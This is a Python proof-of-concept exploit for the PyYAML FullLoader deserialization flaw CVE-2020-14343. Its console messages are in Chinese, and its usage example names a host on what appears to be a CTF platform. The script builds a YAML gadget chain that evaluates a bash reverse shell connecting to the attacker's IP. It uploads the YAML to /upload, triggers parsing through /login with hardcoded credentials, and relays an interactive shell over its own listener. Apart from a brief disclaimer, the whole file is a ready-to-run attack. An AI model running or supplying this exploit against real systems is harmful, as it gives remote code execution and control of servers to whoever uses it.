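"""CVE-2020-14343 proof of concept: PyYAML FullLoader deserialization.

The target is assumed to accept a YAML file at ``/upload`` and to parse it
with a vulnerable PyYAML ``full_load`` while handling a later ``/login``.
The uploaded document uses the ``python/object/new:tuple`` ->
``python/object/new:map`` -> ``python/name:eval`` chain that
CVE-2020-14343 re-enabled in the FullLoader, so parsing it evaluates a
Python expression that spawns a bash reverse shell back to our listener.

Flow: start a TCP listener in a background thread, upload the payload,
trigger the parse via ``/login``, then hand the console to the shell.

Only use this against systems you are explicitly authorized to test.
"""

import socket
import sys
import threading
import time

import requests

# Per-request HTTP timeout (seconds); without one a stalled target hangs
# the PoC forever on the first POST.
HTTP_TIMEOUT = 15
# How long main() waits for the listener thread to bind before firing.
LISTENER_READY_TIMEOUT = 5


def _build_payload(attacker_ip, attacker_port):
    """Return the malicious YAML document as text.

    The ``host``/``info``/``user`` keys presumably mirror the config schema
    the target expects (verify against the target app); the ``x`` key is
    the deserialization gadget.  The YAML double-quoted string keeps the
    inner ``\\"`` escapes so the eval'd Python source reads
    ``system('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')``.
    """
    return f"""host: {attacker_ip}
info: Test
user: Admin
x: !!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('bash -c \\\"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\\\"')"]
"""


def exploit(target_url, attacker_ip, attacker_port, *, timeout=HTTP_TIMEOUT):
    """Upload the malicious YAML, then hit ``/login`` to make the server parse it.

    Args:
        target_url: Base URL of the target (``http://host[:port]``); a
            trailing slash is tolerated.
        attacker_ip: Address the reverse shell should connect back to.
        attacker_port: Port the reverse shell should connect back to.
        timeout: Per-request timeout in seconds (keyword-only).

    Returns:
        True when the login request returned HTTP 200, False on a request
        failure or any other status.  A 200 is only a heuristic that the
        trigger request completed; the real confirmation is a connection
        arriving at the listener.
    """
    base = target_url.rstrip('/')
    files = {
        'file': ('userConfig.yaml', _build_payload(attacker_ip, attacker_port), 'application/x-yaml')
    }

    # One session for both steps so any cookie set by /upload is presented
    # on /login -- the server may tie the uploaded config to the session.
    session = requests.Session()

    # Step 1: upload the malicious YAML.
    print(f"[+] 上传恶意YAML文件到 {base}/upload")
    try:
        upload_response = session.post(
            f"{base}/upload",
            files=files,
            allow_redirects=False,
            timeout=timeout,
        )
        print(f"[+] 上传响应: {upload_response.status_code}")
    except requests.RequestException as e:
        print(f"[-] 上传失败: {e}")
        return False

    # Step 2: trigger the deserialization.  The credentials are whatever
    # the target app accepts for the uploaded config (``user: Admin``);
    # adjust if your target differs.
    print("[+] 触发反序列化漏洞...")
    login_data = {
        'username': 'Admin',
        'password': '123456',
    }
    try:
        login_response = session.post(
            f"{base}/login",
            data=login_data,
            headers={'Content-Type': 'application/x-www-form-urlencoded'},
            timeout=timeout,
        )
    except requests.RequestException as e:
        print(f"[-] 触发漏洞失败: {e}")
        return False

    print(f"[+] 登录响应: {login_response.status_code}")
    if login_response.status_code == 200:
        print("[+] 漏洞利用成功!检查反弹shell连接...")
        return True
    print(f"[-] 可能利用失败,状态码: {login_response.status_code}")
    return False


def _relay(conn):
    """Drive a minimal interactive session over ``conn``.

    Strictly alternating: read one chunk from the remote shell, print it,
    read one line from stdin, send it.  Output that arrives in more than
    one chunk is only shown after the next command is entered.  Typing
    ``exit``, Ctrl+C, EOF on stdin, or the peer closing ends the loop.
    """
    while True:
        try:
            data = conn.recv(4096)
            if not data:
                break
            # flush: the shell prompt has no newline, so without it the
            # text may sit in the stdout buffer while we block in input().
            print(data.decode('utf-8', errors='ignore'), end='', flush=True)
            cmd = input()
            if cmd.strip().lower() == 'exit':
                break
            # sendall, not send: send() may write only part of the buffer.
            conn.sendall((cmd + '\n').encode())
        except KeyboardInterrupt:
            print("\n[*] 用户中断")
            break
        except (OSError, EOFError) as e:
            print(f"\n[-] 错误: {e}")
            break


def start_listener(port, ready=None):
    """Bind ``0.0.0.0:port``, accept one connection and relay a shell over it.

    Args:
        port: TCP port to listen on.
        ready: Optional ``threading.Event`` set once the socket is listening,
            so the caller can wait for readiness instead of sleeping.

    Bind/accept failures (e.g. port already in use) are reported and the
    function returns; ``ready`` is then never set.  Both the listening and
    the accepted socket are closed on every exit path.
    """
    print(f"[*] 在端口 {port} 启动监听器...")
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind(('0.0.0.0', port))
            srv.listen(1)
            print(f"[+] 监听器已在 0.0.0.0:{port} 启动")
            if ready is not None:
                ready.set()
            conn, addr = srv.accept()
            with conn:
                print(f"[+] 收到来自 {addr[0]}:{addr[1]} 的连接!")
                _relay(conn)
    except OSError as e:
        print(f"[-] 监听器错误: {e}")


def main():
    """CLI entry point: ``<target URL> <attacker IP> <attacker port>``."""
    if len(sys.argv) != 4:
        print("用法: python cve-2020-14343_poc.py <目标URL> <攻击者IP> <攻击者端口>")
        print("示例: python cve-2020-14343_poc.py http://eci-2ze9naefg4wclmatagkc.cloudeci1.ichunqiu.com 192.168.1.100 4444")
        sys.exit(1)

    target_url = sys.argv[1]
    attacker_ip = sys.argv[2]
    try:
        attacker_port = int(sys.argv[3])
    except ValueError:
        attacker_port = -1
    if not 1 <= attacker_port <= 65535:
        print(f"[-] 无效的端口: {sys.argv[3]}")
        sys.exit(1)

    print("[*] CVE-2020-14343 PyYAML反序列化漏洞利用")
    print(f"[*] 目标: {target_url}")
    print(f"[*] 反弹shell到: {attacker_ip}:{attacker_port}")

    # Start the listener first; wait for it to actually be bound rather
    # than sleeping a fixed interval.
    ready = threading.Event()
    listener_thread = threading.Thread(
        target=start_listener, args=(attacker_port, ready), daemon=True
    )
    listener_thread.start()
    if not ready.wait(LISTENER_READY_TIMEOUT):
        # Not fatal: the port may be held by an external listener (e.g. nc)
        # that the operator intends to catch the shell with.
        print(f"[-] 监听器未在 {LISTENER_READY_TIMEOUT} 秒内就绪 (端口被占用?), 继续尝试利用")
        time.sleep(1)

    print("\n[*] 开始漏洞利用...")
    if exploit(target_url, attacker_ip, attacker_port):
        print("[+] 漏洞利用完成!")
    else:
        print("[-] 漏洞利用失败!")

    try:
        print("\n[*] 等待反弹shell连接... (Ctrl+C 退出)")
        listener_thread.join()
    except KeyboardInterrupt:
        print("\n[*] 退出程序")


if __name__ == "__main__":
    main()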